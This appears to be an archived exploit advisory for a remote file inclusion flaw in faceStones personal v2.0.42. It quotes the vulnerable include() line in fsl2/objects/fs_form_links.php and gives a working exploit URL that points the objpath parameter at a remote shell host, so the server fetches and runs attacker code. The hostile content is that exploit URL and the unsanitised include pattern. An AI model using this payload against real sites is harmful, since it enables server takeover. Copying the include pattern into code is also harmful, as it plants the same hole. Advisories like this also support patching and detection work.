SecurityvulnsSECURITYVULNS:DOC:14422faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit
#==============================================================================================
#faceStones personal <= v2.0.42 (objpath) Remote File Inclusion Exploit
#===============================================================================================
#Critical Level : Dangerous
#Venedor site : http://www.facestones.de/fshtml/service/download/index.php
#Version : v2.0.42
#================================================================================================
#Bug in : fsl2/objects/fs_form_links.php
#Vlu Code :
#--------------------------------
include($GLOBALS['fsinit']['objpath'] . '/fs_display_indextab.php');
#================================================================================================
#Exploit :
#--------------------------------
#http://sitename.com/[Script Path]/fsl2/objects/fs_form_links.php?GLOBALS[fsinit][objpath]=http://SHELLURL.COM
#================================================================================================
#Discoverd By : SHiKaA
#Conatact : SHiKaA-[at]hotmail.com